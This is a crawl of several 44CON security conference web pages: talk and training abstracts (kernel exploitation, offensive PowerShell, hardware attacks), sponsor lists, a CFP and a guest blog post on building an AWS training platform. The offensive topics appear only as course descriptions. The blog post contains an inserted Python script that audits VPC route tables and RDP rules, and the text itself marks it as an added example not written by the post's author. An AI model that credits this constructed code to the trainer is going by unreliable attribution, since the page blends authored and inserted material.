          The concept of lattice-based asymmetric encryption will be explained with a two-dimensional grid (real-world implementations use 250 dimensions and more). Some lattice-based ciphers (e.g., New Hope) make use of the Learning with Error (LWE) concept. I will demonstrate LWE encryption in a way that is understandable to somebody who knows Gaussian elimination (this is taught at middle school). Other lattice-based systems (especially NTRU) use truncated polynomials, which I will also explain in a simple way.

          Code-based systems:

          McEliece and a few other asymmetric ciphers are based on error correction codes. While teaching the whole McEliece algorithm might be too complex for a 44CON presentation, it is certainly possible to explain error correction codes and the main McEliece fundamentals.

          Non-commutative systems:

          There are nice ways to explain non-commutative groups and the crypto systems based on these, using everyday-life examples. Especially, twisting a Rubik’s Cube and plaiting a braid are easy-to-understand group operations a crypto system can be built on.

          Multivariate systems:

          Multivariate crypto can be explained to somebody who knows Gaussian elimination.

          Hash-based signatures:

          If properly explained, Hash-based signatures are easier to understand than any other asymmetric crypto scheme.

          I will explain these systems with cartoons, drawings, photographs, a Rubik’s Cube and other items.

          In addition, I will give a short introduction to quantum computers and the current Post-Quantum Crypto Competition (organised by US authority NIST).

          Security module for php7 – Killing bugclasses and virtual-patching the rest!

          Presented by: Julien Voisin and Thibault Koechlin

          Suhosin is a great PHP module, but unfortunately, it’s getting old, new ways have been found to compromise PHP applications, and some aren’t working anymore; and it doesn’t play well with the shiny new PHP 7. As a secure web-hosting company, we needed a reliable and future-proof solution to address the flow of new vulnerabilities that are published every day. This is why we developed Snuffleupagus, a new (and open-source!) PHP security module, that provides several features that we needed: passively killing several PHP-specific bug classes, but also implementing virtual-patching at the PHP level, allowing to patch vulnerabilities in a precise, false-positive-free, ultra-low overhead way, without even touching the applications’ code.

          Reverse Engineering and Bug Hunting on KMDF Drivers

          Presented by: Enrique Nissim

          Numerous technical articles, presentations, and even books exist about reverse engineering the Windows Driver Model (WDM) for purposes that vary from simply understanding how a specific driver works, to malware analysis and bug hunting. On the other hand, Microsoft has been providing the Kernel Mode Driver Framework (KMDF) for quite a while and we now see more and more drivers shifting to this framework instead of interacting directly with the OS like in the old WDM times. Yet, there is close to no information on how to approach this model from a reverse engineering and offensive standpoint.
          In this presentation, I will first do a quick recap on WDM drivers, its common structures, and how to identify its entry points. Then I’ll introduce KMDF with all its relevant functions for reverse engineering through a set of case-studies. I’ll describe how to interact with a KMDF device object through SetupDI api and how to find and analyze the different IO queues dispatch routines. Does the framework actually enhance security? We’ll come to a conclusion after revealing some major vendor implementation problems.
          Armed with this knowledge, you will be able to run your own bug hunting session over any KMDF driver.

           

          Also check our list of Workshops for 44CON 2018.

          #####EOF##### Archive – 44CON

          Archive

          Over the years we’ve run a lot of 44CON conferences and other events too. If you’re looking for something specific the search engine may be able to help. Here’s a list of what we’ve done over time.

          2019

          2018

          2017

          2016

          2015

          2014

          2013

          2012

          2011

          Our records, like our memories, are hazy. Some talks are up on our YouTube channel.

          A list of all previous speakers can be found here. Thanks to every one of them for speaking at our events.

          #####EOF##### 44CON 2012 Sponsors – 44CON

          44CON 2012 Sponsors

          MWR InfoSecurity

          http://www.mwrinfosecurity.com

          MWR are honoured to be involved with 44CON again this year. After the outstanding success of the inaugural 44CON event last year we are confident that the 44CON team behind the UK’s premier security conference will go on to deliver an even more amazing event this year!

          RIM

          http://www.blackberry.com/security

          Research In Motion (RIM) revolutionized the mobile industry with the introduction of the BlackBerry® solution in 1999. BlackBerry Security is a world class organization working to make BlackBerry one of the most secure mobile platforms available by providing an end to end security focus.

          Elcomsoft

          http://www.elcomsoft.com/

          ElcomSoft Co Ltd is a world-leader in computer and mobile forensics, having pioneered numerous cryptologic techniques and providing a range of tools, training and consulting services to law enforcement, corporate and intelligence agencies.

          Raytheon

          http://www.raytheon.com

          Raytheon has more than 30 years of experience securing some of the world’s most critical and sensitive programmes and systems. We work in some of the most demanding cyber security and intelligence environments in the world and bring our customers the capabilities and cyber business change to ensure they stay ahead of threats. We look at ways organisations can actively disrupt the command and control of an adversary within their domain; the focus is not purely on a layered defence.

          Carbon Black

          http://www.carbonblack.com

          Carbon Black is a surveillance camera for your computer – always recording so you know precisely what happened and where. The “camera” collects and retains five key elements as they are occurring: records of execution; filesystem modifications; registry modifications; new outbound network connections and unique binaries – as well as the relationship among them.

          SourceFire

          http://www.sourcefire.com

          Sourcefire is a market leading provider of intrusion detection systems and vulnerability analysis. Sourcefire’s Agile Security vision is defining a new, essential and more effective approach for organisations to protect themselves against today’s security realities.

          NCC Group

          http://www.nccgroup.com

          NCC Group is a leading global information assurance firm, providing freedom from doubt that all critical material is available, protected, and operating as it should be at all times. Information assurance is delivered through escrow and verification, security testing, audit and compliance, software testing and web performance services.

          SensePost

          http://sensepost.com

          The lack of a world-class security conference in the UK has finally been filled by 44CON. No longer does the UK infosec community have to go overseas to see security researchers present cutting-edge research and ideas. SensePost is proud to be associated with 44CON.

          44CON Supporters

          TigerScheme

          http://www.tigerscheme.org/

          Founded in 2007 on the principle that a commercial certification scheme run on independent lines would give buyers of security testing services confidence that they were hiring a recognised and reputable professional, Tiger Scheme is now the UK’s leading independent, University-recognised certifier of vulnerability testing and digital forensics skills within the UK.

          CREST

          http://www.crest-approved.org

          CREST is a not for profit organisation that serves the needs of an information security marketplace that requires the services of a regulated and professional security testing.

          CheckSec

          https://www.checksec.com

          CheckSec is a UK based provider of security services and technologies, with a global focus. We provide services and solutions to help our customers manage their security requirements. Our customers include security consultancies and security consumers based in Europe, the US, Africa and the Middle East.

          ITC Security

          http://www.itcsecurity.com/

          Founded in 1995, ITC are a network and security integrator providing businesses with assured IT. We design, build, optimise and manage your Network & Security infrastructures, enhancing network performance, safeguarding information and simplifying management. At the core of ITC is our dedicated Secure Operations Centre (SOC) in London, where we have developed and deliver NetSure360°. This unique service integrates management of our customers’ Network & Security infrastructures providing them with complete visibility, control and assurance through real time performance dashboards and risk analysis.

          Mandalorian

          http://www.mandalorian.com

          Mandalorian are an independent UK-based provider of information security services with specialisms in penetration testing and malware analysis. We focus on being the easiest supplier you’ve ever worked with and being fanatical about the quality of our work.

          #####EOF##### Tickets for 44CON 2016 are on sale – 44CON

          Tickets for 44CON 2016 are on sale

          44CON 2016 tickets are now on sale in our shop, so go and get yours now!

          We also have 4 great training courses by Saumil Shah, Dawid Czagan, Joe FitzPatrick, Dominic Chell and Marcus Pinto. Go check them out and book your place early to avoid disappointment, as courses will be cancelled if minimum numbers are not reached 3 weeks before the conference.

          44CON is the UK’s premier annual technical security conference and training event. 44CON 2016 will be taking place from the evening of the 14th September until the 16th September at the ILEC Conference Centre. You can expect a jam-packed few days of awesome talks, food and of course alcohol.

          Our CFP closes tonight (Friday 10th June) so if you have something awesome to share get it in now before it’s too late.

          Finally, check this great day out at the Farnborough International Air Show from our friends at Suits & Spooks on 14th July, Counterespionage: the need for speed, and use the code 44CON for a 5% discount on both package options.

          #####EOF##### 44CON 2017 Training – 44CON

          44CON 2017 Training

          All training courses will be run between the 11th and 13th September 2017 at etc venues The Hatton except Saumil Shah’s course which will run at etc venues Marble Arch and Brian Butterly & Hendrik Schmidt’s course which will take place at a venue to be confirmed.

          Presented by: Ashfaq Ansari

          This training is focused on exploitation of different Windows Kernel Mode vulnerabilities. We will cover basics of Windows Kernel Internals and hands-on fuzzing of Windows Kernel Mode drivers.

          We will dive deep into exploit development of various kernel mode vulnerabilities. We will also look into different vulnerabilities in terms of code and the mitigations applied to fix the respective vulnerabilities.

          This training assumes that the attendees have little or no prior experience with Windows Kernel Internals and Kernel land as well as User land exploitation techniques.

           Course Length: 3 days (11th-13th September 2017)

          Presented by: Dominique C. Brack

          This is the first time the Social Engineering Engagement Framework (SEEF) author has offered an in-person public workshop. Normally the workshops and briefings are closed-group, private enterprise or Government-only workshops. Profit from the first-hand knowledge and experience of a social engineering and information security professional with 20 years of experience. What you will learn: Tools and techniques to plan, execute and manage social engineering engagements. What can and will be used against you, your employees and your organization. This training will provide the skills to detect, defend against and assess social engineering attacks and the associated risk. You will learn the motivations and methods used by social engineers, enabling you to better protect yourself and your organization.

          Course Length: 2 days (12th-13th September 2017)

          Brian Butterly & Hendrik Schmidt

          The course is oriented around a few common market devices: GPS trackers, automotive trackers with immobilizers, smart meters and small scale industrial control systems. While demonstrations will be performed on the actual devices, the attendees will work on cellular development boards which basically emulate the behavior identified on the practical device. To be able to use actual cellular communications basestations, custom SIM cards and basic VMs will be provided, together with a cable setup which offers a simple solution for circumventing potential legal issues.

           Course Length: 3 days (11th-13th September 2017)

          Presented by: Luca Carettoni

          Ensuring the security of web applications in continuous delivery environments is an open challenge for many organizations. Traditional application security practices slow development and, in many cases, don’t address security at all. Instead, a new approach based on security automation and tactical security testing is needed to ensure important components are being tested before going live. Security professionals must master their tools to improve the efficiency of manual security testing as well as to deploy custom security automation solutions.

          Based on this premise, we have created a brand-new class taking advantage of Burp Suite – the de-facto standard for web application security. In two days, we show you how to use Burp Suite’s extension capabilities and unleash the power of the tool to improve efficiency and effectiveness during security audits.

          Course Length: 2 days (12th-13th September 2017)

          Presented by: Joe FitzPatrick

          This course introduces and explores attacks on several different relatively accessible interfaces on embedded systems. Attendees will get hands-on experience implementing and deploying a number of low-cost hardware devices to enable access, privilege, and deception which is in some cases imperceptible from software. We’ll examine UART, JTAG and SPI interfaces on embedded devices, representative of a wide range of embedded devices that span consumer electronics, medical devices, industrial control hardware, and mobile devices. We will observe, interact with, and exploit each interface to use physical access to enable software privilege.

          Course Length: 2 days (12th-13th September 2017)

          Presented by: Erik Hjelmvik

          The network forensics training class consists of a mix of theory and hands-on labs, where students will learn to analyze Full Packet Capture (FPC) files. The scenarios in the labs are primarily focused on network forensics for incident response, but are also relevant for law enforcement/internal security etc. where the network traffic of a suspect or insider is being monitored.

          Course Length: 2 days (12th-13th September 2017)

          Presented by: Nikhil Mittal

          Penetration Tests and Red Team operations for secured environments need altered approaches. You cannot afford to touch disk, throw executables and use memory corruption exploits without the risk of being ineffective as a simulated adversary. To enhance offensive tactics and methodologies, PowerShell is the tool of choice.

          PowerShell has changed the way Windows networks are attacked. It is Microsoft’s shell and scripting language, available by default on all modern Windows computers. It can interact with .Net, WMI, COM, Windows API, Registry and other computers on a Windows Domain. This makes it imperative for Penetration Testers and Red Teamers to learn PowerShell.

          This training is aimed towards attacking Windows networks using PowerShell and is based on real world penetration tests and Red Team engagements for highly secured environments. The course runs as a penetration test of a secure environment with detailed discussion and use of custom PowerShell scripts in each phase.

           Course Length: 3 days (11th-13th September 2017)

          Presented by: Marcus Pinto, MDSec

          The Web Application Hacker’s Handbook (WAHH) Series is the most deep and comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          Course Length: 2 days (12th-13th September 2017)

          Presented by: Saumil Shah

          ARM has emerged as the leading architecture in the Internet of Things (IoT) world. The all new ARM IoT Exploit Laboratory is a fast paced 3-day intermediate level class intended for students who want to take their exploit writing skills to the ARM platform. The class covers everything from an introduction to ARM assembly all the way to Return Oriented Programming (ROP) on ARM architectures. Our lab environment features hardware and virtual platforms for exploring exploit writing on ARM based Linux systems and IoT devices.

          The class concludes with an end-to-end “Firmware-To-Shell” hack, where we extract the firmware from a popular SoHo router, build a virtual environment to emulate and debug it, and then use the exploit to gain a shell on the actual hardware device.

           Course Length: 3 days (11th-13th September 2017)

           

          Book your 44CON 2017 training course now!

          #####EOF##### 44CON CFP 2019

          44CON 2019 Call For Papers

          This is the Call for Papers for the 9th Annual 44CON security conference, held from the 11th to 13th of September, 2019 at the ILEC Conference Centre, Lille Road, London. We invite jaded cynics, pessimists, optimists and opportunists to come together and join our broad church where the latest research of the day will be discussed, debated and debased.

          44CON has two main talk tracks, a workshop track and several breakout areas including a village hall expo track, a mental health village and a village pub. Additionally, 44CON will host the ManyHats Club meetup on the evening of Thursday 12th September, which will feature its own separately organised talks. The CFP covers the two main talks and workshop tracks only.

          Purchase early bird tickets (capped at 50) or sign up to our mailing list to be notified when regular tickets go on sale.

          If you have any pressing queries or concerns, please get in touch.

          Submissions for technical and infosec professional presentations & workshops will be accepted. Presentations are 45 minutes long with 5 minutes for Q&A. Workshops are 1-2 hours long including setup/breakdown time.

          • A presentation on the main tracks is in front of a seated audience.
          • A Workshop is like a mini training course - e.g. a 2 hour walk through Windows Kernel internals and local privilege escalation opportunities.

          Talks are filmed. Workshops are not.

          In particular, we are looking for original talks of the highest quality in the following areas:-

          Note: this is not an exhaustive list. If you have a good talk proposal, please submit it for consideration.

          • Offensive security talks for the advanced Pentester or Red Teamer
          • Defensive talks for SOC analysts, threat hunters or enthusiastic amateur defenders
          • Talks on bugs, bug classes, finding and fixing security bugs
          • Incident Handling, Forensics and Anti-Forensics
          • Virtualisation, Container, and Cloud Computing Security
          • Cryptography, Cryptocurrencies, Cryptozoology and other Crypto-fu
          • Hardware attacks and defence tools, techniques and practices
          • Application and Mobile Security
          • Networking, Comms, Critical National Infrastructure (CNI)
          • Cyberspace, Policing, Law, Interception and Human Rights

          Priority is generally given to new presentations over those presented elsewhere. If you have a presentation that you have given or will give elsewhere prior to 44CON London in September and wish to submit, please let us know in your submission, and inform us of any changes you intend to make for 44CON London.

          If your talk or workshop is new, please let us know the details of other conference(s) to which you have or intend to submit through the CFP system.

          It's extremely hard for a talk to get accepted to 44CON because of the small number of slots compared to the volume of high quality submissions. If your submission is not accepted, it's not a rejection of you as a speaker (except in extreme cases, in which case we'll tell you). To boost your chances, take a look at how to game the CFP and some detail on how our CFP process works.

          All 44CON speakers will be entitled to the following:

          • 2-3 nights accommodation (see below)
          • Breakfast & Lunch during conference
          • Love and TLC from our awesome speaker ops team
          • Event access for both days, all nights and pre/post event drinks
          • This year we're running a Speaker's English Wine tasting (yes, you read that right) session
          • We also have a small event on the Tuesday evening that speakers are welcome to attend

          Accepted primary presentation speakers get the following:

          • Paid travel (for primary speaker outside of Fulham, Putney or Central London)
          • 2 nights of accommodation for the primary speaker (normally the Wednesday and Thursday nights)

          Accepted primary presentation speakers also presenting a workshop get the following:

          • Paid travel (for primary speaker outside of Fulham, Putney or Central London)
          • 3 nights of accommodation for the primary speaker (normally the Wednesday, Thursday and Friday nights)

          Accepted primary workshop presenters without an associated talk get the following:

          • 2 nights of accommodation for the primary speaker (normally the Wednesday and Thursday nights)
          • Travel is not covered

          In 2018 we had speakers from the UK, Australia, China, the USA, South Africa, Europe, The Middle East and more.

          We welcome speakers of all genders, origins and physical abilities. If you have any particular requirements please tell us so we can accommodate them. We are a non-alcoholic, Coeliac, Vegan, Kosher, Halal and Gluten-free friendly event. Talks are to be delivered in English, only. Partners are welcome to come along and we're happy to help arrange for tourist things for you and your partners to do while in London. Please let us know should you want to do this, so we can make your time here memorable.

          Official CFP open: Tuesday 26th February 2019
          Final CFP deadline: Tuesday 30th April 2019, 23:59pm UTC
          First accept notifications: Monday 27th May 2019
          Speaker notifications start: Monday 3rd June 2019
          Speaker announcements start: Wednesday 5th June 2019 @ BSides London 2019
          Speaker flight details to be submitted by: Friday 19th July, 2019
          Papers/Tools/Presentation submission deadline: Friday 30th August 2019
          44CON Training: 9th-11th September 2019
          44CON Conference: 11th-13th September 2019
          #####EOF##### 44CON 2017 Schedule Available. – 44CON

          44CON 2017 Schedule Available.

          Here you go, folks: the 44CON 2017 schedule is now available here.

          Go take a look at all the wonderful talks and workshops we have lined up for you! As with all things, the schedule could be subject to some last minute changes, so make sure you keep an eye out on the day so you don’t miss out.

          If you haven’t got your ticket yet, there are some still available here.

          We look forward to seeing you all in September.

          #####EOF##### Building an AWS and Azure security training platform – 44CON

          Building an AWS and Azure security training platform

          This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

          Part 1 – Proof of Concept

          The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

          When I’ve delivered similar courses in the past, students brought their own laptops and installed the software they needed for the hands-on AWS and Azure security labs, either in advance or during the course.

          For this course, Steve suggested I create a YouTube video showing how to install the various software needed, and that got me thinking – wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

          So I started looking at building a training platform which students can use – and as this is a cloud security course, what better place to do this than in the cloud?

          First step was a proof of concept – so I created some Amazon WorkSpaces instances in the cloud, manually using the AWS console, and started installing software.

          Within 30 minutes, I had created two virtual desktops in the cloud – one Windows, the other Linux, and connected to each in turn with the Amazon WorkSpaces client from my laptop. The user experience was really good – even when connecting over mobile data. Then I installed the software I needed for the course, tested it, and created workspace bundles to be used as images for future builds. I created new WorkSpaces from the bundles to make sure that they came up correctly with all the software preinstalled and configured.

          So I’ve successfully proved the concept – the next step is to develop a design for a solution which could be used for 10 – 20 students, with full automation for building and tearing down the training environment immediately after the course – to avoid unnecessary bills!

          This is the design I came up with, after doing some research on Amazon WorkSpaces and AWS Directory Services:

          AWS Directory Services has several options, the one I selected was Microsoft Active Directory Standard Edition, which can be used with both Windows and Linux Amazon WorkSpaces.

          As this is a cloud security course, it’s important that the design isn’t just functional, but also demonstrates secure cloud architectures.

          The design includes:
          • Virtual Private Cloud (VPC) with private address space
          • private user subnets, containing the AWS managed Active Directory domain controllers and the WorkSpaces, with no route to the Internet
          • public DMZ subnets for outbound access to the Internet using NAT Gateways
          • Windows Server 2016 instance for administration and setup of the Active Directory domain, users and groups
          • Security group on the admin server only allowing inbound remote desktop access from a single IP address.

          If you’re wondering how the Amazon WorkSpaces client connects via the Internet, that’s not shown on this diagram, as it’s managed by AWS via a second network interface on each WorkSpace virtual desktop.
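The network properties in the design list above can be checked mechanically. The following is an added example, not code from Paul's post or his platform: it audits data shaped like the EC2 DescribeRouteTables and DescribeSecurityGroups responses, with all IDs, addresses and helper names constructed for illustration. It assumes "no route to the Internet" means no default route to an internet gateway, so outbound access through a NAT Gateway is accepted.

```python
import ipaddress

RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
RDP_PORT = 3389
LOCAL = {"DestinationCidrBlock": "10.0.0.0/16", "GatewayId": "local"}


def route_table_for(subnet_id, route_tables):
    """Explicit association wins; otherwise the subnet inherits the main table."""
    main = None
    for rt in route_tables:
        for assoc in rt.get("Associations", []):
            if assoc.get("SubnetId") == subnet_id:
                return rt
            if assoc.get("Main"):
                main = rt
    return main


def internet_path(route_table):
    """Classify the table's default route(s) as 'igw', 'nat' or 'none'."""
    path = "none"
    for route in (route_table or {}).get("Routes", []):
        dest = route.get("DestinationCidrBlock") or route.get("DestinationIpv6CidrBlock")
        if dest not in ("0.0.0.0/0", "::/0"):
            continue
        if (route.get("GatewayId") or "").startswith("igw-"):
            return "igw"          # directly reachable from the Internet
        if route.get("NatGatewayId"):
            path = "nat"          # outbound only
    return path


def rdp_rule_findings(security_group):
    """Inbound rules must be TCP/3389 only, from exactly one IPv4 /32."""
    findings, sources = [], []
    for perm in security_group.get("IpPermissions", []):
        proto = perm.get("IpProtocol")
        ports = (perm.get("FromPort"), perm.get("ToPort"))
        if proto != "tcp" or ports != (RDP_PORT, RDP_PORT):
            findings.append(f"rule allows {proto} ports {ports}, expected tcp {RDP_PORT} only")
        if perm.get("Ipv6Ranges") or perm.get("UserIdGroupPairs") or perm.get("PrefixListIds"):
            findings.append("rule has sources other than IPv4 CIDRs")
        sources += [r["CidrIp"] for r in perm.get("IpRanges", [])]
    if len(set(sources)) != 1:
        findings.append(f"expected exactly one source CIDR, found {len(set(sources))}")
    for cidr in sorted(set(sources)):
        if ipaddress.ip_network(cidr, strict=False).prefixlen != 32:
            findings.append(f"source {cidr} is wider than a single address")
    return findings


def audit(vpc_cidr, private_subnets, route_tables, admin_sg):
    """Return a list of findings; an empty list means the design holds."""
    findings = []
    net = ipaddress.ip_network(vpc_cidr)
    if not any(net.subnet_of(r) for r in RFC1918):
        findings.append(f"VPC CIDR {vpc_cidr} is not private address space")
    for subnet in private_subnets:
        if internet_path(route_table_for(subnet, route_tables)) == "igw":
            findings.append(f"{subnet} has a default route to an internet gateway")
    findings += [f"{admin_sg['GroupId']}: {f}" for f in rdp_rule_findings(admin_sg)]
    return findings


# --- Constructed sample data (not from a real account) ---
PRIVATE_SUBNETS = ["subnet-user-a", "subnet-user-b"]
NAT_DEFAULT = {"DestinationCidrBlock": "0.0.0.0/0", "NatGatewayId": "nat-example"}
IGW_DEFAULT = {"DestinationCidrBlock": "0.0.0.0/0", "GatewayId": "igw-example"}

GOOD_ROUTES = [
    {"RouteTableId": "rtb-main", "Associations": [{"Main": True}], "Routes": [LOCAL]},
    {"RouteTableId": "rtb-user", "Routes": [LOCAL, NAT_DEFAULT],
     "Associations": [{"SubnetId": "subnet-user-a"}, {"SubnetId": "subnet-user-b"}]},
    {"RouteTableId": "rtb-dmz", "Routes": [LOCAL, IGW_DEFAULT],
     "Associations": [{"SubnetId": "subnet-dmz-a"}]},
]
# Drift: subnet-user-b lost its association and now inherits a main table
# that someone pointed at the internet gateway.
BAD_ROUTES = [
    {"RouteTableId": "rtb-main", "Associations": [{"Main": True}],
     "Routes": [LOCAL, IGW_DEFAULT]},
    {"RouteTableId": "rtb-user", "Routes": [LOCAL, NAT_DEFAULT],
     "Associations": [{"SubnetId": "subnet-user-a"}]},
]
GOOD_SG = {"GroupId": "sg-admin", "IpPermissions": [
    {"IpProtocol": "tcp", "FromPort": 3389, "ToPort": 3389,
     "IpRanges": [{"CidrIp": "203.0.113.10/32"}]}]}
BAD_SG = {"GroupId": "sg-admin", "IpPermissions": [
    {"IpProtocol": "tcp", "FromPort": 3389, "ToPort": 3389,
     "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}]}

if __name__ == "__main__":
    for name, routes, sg in (("good", GOOD_ROUTES, GOOD_SG), ("bad", BAD_ROUTES, BAD_SG)):
        print(name, audit("10.0.0.0/16", PRIVATE_SUBNETS, routes, sg))
```

The second data set shows a failure mode that is easy to miss in review: a subnet with no explicit route table association silently inherits the VPC's main route table.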

          The next step is to set up a new AWS account for the training platform. I’ll cover that in the next Blog post.

          Paul’s Cloud Security and DevOps Workshop course runs on the 6th and 7th of June.

          #####EOF##### 44CON 2012 Presentations – 44CON

          44CON 2012 Presentations

          44Con 2012 has two tracks, with different themes depending on the day. Day 1 is Fast track day, consisting of an info sec track covering the softer and more business-focused side of security and a turbo track, containing full info sec talks and busy-reader turbo talk editions of the next two days’ research, pitched at managers and advisors who might not have the time or technical focus for the full talks, but may need to take action based on the research being presented.

          The second and third days consist of technical talks. Where possible, more hard-core or less accessible but technically interesting talks will be paired with more accessible talks.

          As well as this, workshops will run across all three days pitched at their respective audiences.

          The talks listed below are split into the first day and the remaining two, so that when it comes to buying tickets you’ll know what to expect. More talks will be added as they’re accepted. The Call For Papers closed at the end of May 2012.

          Day 1 talks

          Software Security Austerity – Software security debt in modern software development

          Presented by: Ollie Whitehouse

          What happens when you’ve implemented your SDLC or started your security mindfulness activities and got good at finding security issues? Typically you won’t be able to fix them all and as a result you start to accrue vast amounts of known security debt. This is compared to doing another and having large amounts of latent security debt.

          The concept of technical debt within software was first introduced in 1992 by Ward Cunningham. This presentation outlines the general problem of software (or application) security debt while also outlining a number of considerations and strategies for managing the problem. The presentation will discuss the business realities when dealing with security debt, how these realities can be balanced and why there are parallels with the recent financial austerity measures we’ve seen and what we should learn from recent events.


          Securing the Internet: YOU’re doing it wrong (An INFOSEC Intervention)

          Presented by: Jayson E. Street

          YAY I broke________<-Insert protocol, device, OS or Internet if you’re Dan.

          My question though is great! Now how do we not go about fixing it but actually go about communicating these issues to upper management & end users? I will talk about three points

          1. Getting upper management involved and behind your security initiatives.
          2. Educating, empowering & enforcing your workforce to be a part of your INFOSEC team not the core weakness of it.
          3. How the INFOSEC echo chamber is not helping the situation and how we can take a moment from being awesomely right to being helpful and gracious.

          Security Architecture & SMART

          Presented by: Phil Huggins

          Security Architecture & SMART

          What is security architecture?

          Security architecture principles and approaches

          What are the SMART concerns?

          How can you address those in your security architecture?


          Terrorism, tracking, privacy and human interactions

          Presented by: Daniel Cuthbert, Glenn Wilkinson

          Numerous governments have initiated (or already deployed) plans to monitor citizens’ online activity. The monitoring ranges from mobile phone calls and SMS messages, to email, social network interaction, and general browsing habits. Such initiatives are touted under the guise of “anti-terrorism” – with governments advocating its necessity for state security. State security bodies propose access to massive databases detailing citizens habits – and from such raw data they anticipate the ability to profile suspected terrorist behavior.

          Our project goal is to create a similar database (on a much smaller scale) in order to determine both the feasibility of profiling citizens.  In order to achieve such monitoring numerous wireless access points (APs) will be setup in several cities.


          I’m the guy your CSO warned you about

          Presented by:  Gavin Ewan

          Although you may find the following questions simple to answer, ask yourself this –

          Have you read an e-mail recently?

          – Can you be sure everything is as it seems?

          Had a conversation on the phone?

          – Was that really your bank on the line?

          Have you ever clicked a link?

          – Did that go where you expected?  You sure?

          Have you ever plugged in a USB stick?

          – Who had it before you?

          Too many speak of the importance of what hand you use to hold a pen or what direction your eyes look when accessing your brain being some metric in gauging how people fall victim to social engineering.

          Very good, thanks for that, but so what?

          Psychology won’t defend you against google hacking, whether you hold a pen with your right or left hand doesn’t make your public image any more secure.  This talk focuses on the ‘hypothetical bad guy’ and the ‘weapons’ of choice he has in front of him.

          In this talk I will take you through the main arsenal of weapons the bad guy has at his disposal.  Gone are the maybes, probablys and percentages of the population given to us by pure psychology.  In are the real tools of pwnage the bad guy will use without ever having to wear a boiler suit and a fake moustache.

          The talk will include demos of the tools being used and leave attendees with enough information to know how to implement these attacks themselves and better able to defend against them.

          The aim of this talk is to raise awareness of how much damage a bad guy can do with only a handful of tools and an internet connection, social engineering for the modern age.


          SexyDefense – Maximizing the Home-Field Advantage

          Presented by: Ian Amit

          Offensive talks are easy, I know. But the goal of offensive security at the end of the day is to make us better defenders. And that’s hard. Usually after the pentesters (or worse – red team) leave, there’s a whole lot of mess of vulnerabilities, exposures, threats, risks and wounded egos. Now comes the money time – can you fix this so your security posture will actually be better the next time these guys come around?

          This talk focuses mainly on what should be done (note – not what should be BOUGHT – you probably have most of what you need already in place and you just don’t know it yet).

          The talk will show how to expand the spectrum of defenders from a reactive one to a proactive one, will discuss ways of performing intelligence gathering on your opponents, and modeling that would assist in focusing on an effective defense rather than a “best practice” one. Methodically, defensively, decisively. Just like the red-team can play ball cross-court, so should you!


          Why Integrity is left alone and not given TLC (Tender, Love and Care) it deserves?

          Presented by:  Jitender Arora

          Information Security has 3 pillars CIA (Confidentiality, Integrity and Availability). Most organisations spend quite a lot of money in putting Confidentiality (Encryption to secure data in transit or data at rest) and Availability (Disaster Recovery) controls within their environment. For some reason, Integrity controls have been neglected and not many organisations implement Integrity controls to guarantee data accuracy.

          Most business processes rely on accuracy of data to take critical and key business decisions but still mostly it is considered adequate to protect confidentiality of data in transit between 2 nodes or systems. How can we ensure Integrity of data that is used in BI tools to make decisions on critical business propositions? Is it acceptable to rely on Encryption controls to guarantee Integrity of data?

          • Explaining importance of Integrity with some real life use cases from Industry
          • Providing pragmatic options on Integrity Controls

          The idea is to have a thought provoking discussion involving audience.


          House of cards – How not to collapse when bad things happen

          Presented by: Rafal Los

          An unfortunate number of enterprises build their foundations on a false sense of security.  They’ve implemented technical defensive measures, written policies, and have procedures for response – and they feel ‘secure’.  The problem is – until they’ve actively tested these out in real-world scenarios much like disaster recovery drills, they have no idea how well-prepared they really are for when the worst strikes. Perhaps more importantly, they have no idea where things will strain and break and as a result cannot compensate.

          As Information Security leaders often find themselves playing whack-a-mole with compliance, business requirements and resource challenges it can be easy to fall into a sense that everything is under control because on paper the security posture looks good – but how certain are you?  Validating human and technical controls, policy elements and response procedures is vital to the prepared enterprise.  It is true that the only way to design a safe vehicle is to repeatedly crash and re-design it until it meets minimum safety requirements, but all of this must be done before the car is allowed to crash in a real wreck.  Unfortunately, most enterprises simply go by what they’ve planned on paper and it’s not until they wreck in the real world do they find out how poorly prepared they are.

          This talk will expose the audience to the issues of having unproven security and untested defenses in today’s threat landscape… and encourage CISOs to “break more” to provide their leadership with a better level of assurance of preparedness than they have today.  We will provide a framework and step-by-step plan to design, test, and learn from ‘crash data’ to build a truly resilient, responsive and ultimately more risk-averse enterprise.


          Day 2 and 3 talks

          Hacking and Forensics on the Go

          Presented by: Phil Polstra

          This talk will discuss “The Deck”, which is a BeagleBoard configured for hacking and forensics on the go.  The Deck will run an Ubuntu-based Linux OS with many of the nice tools from Backtrack also present.  Some of the planned BT tools include: wireshark, Metasploit (complete with backend database), Jack the Ripper, remote access tools, nmap, and wifi tools.

          I will also discuss a couple of ways to power the Deck using some simple circuits.  Powering options will include USB plugin (which would also allow use of popular USB wall chargers), 9V battery with appropriate circuitry, and Power-Over-Ethernet.

          For those only interested in a forensic device, I will present the 4Card.  The 4Card is a forensics device based on the BeagleBone.  The BeagleBone isn’t powerful enough to use as an attack computer, but it is smaller, cheaper, and consumes less power for those that don’t need an attack platform.


          V-SAT hacking

          Presented by: Paul Marsh

          Following on from 44con 2011’s presentation on ‘Satellite Hacking’ this one will concentrate purely on V-Sat hacking, interception and decoding of data. Packet injection will be covered at a high level. The presentation will cover V-Sat topology and real-world implementations, data transmission formats and parsing of off-air data using well known network sniffing tools. Numerous examples will be given of actual off-air signals as well as practical advice on decoding.


          Big game hunting

          Presented by: Tim Brown

          Simple techniques for bug hunting on big iron UNIX.  The talk will build on the work previously done in my “Breaking The Links” paper but will focus on AIX and associated IBM products.  The talk will include some new bugs as well as going through a simple methodology for finding them.


          Inside .NET smart card operating system

          Presented by: Behrang Fouladi

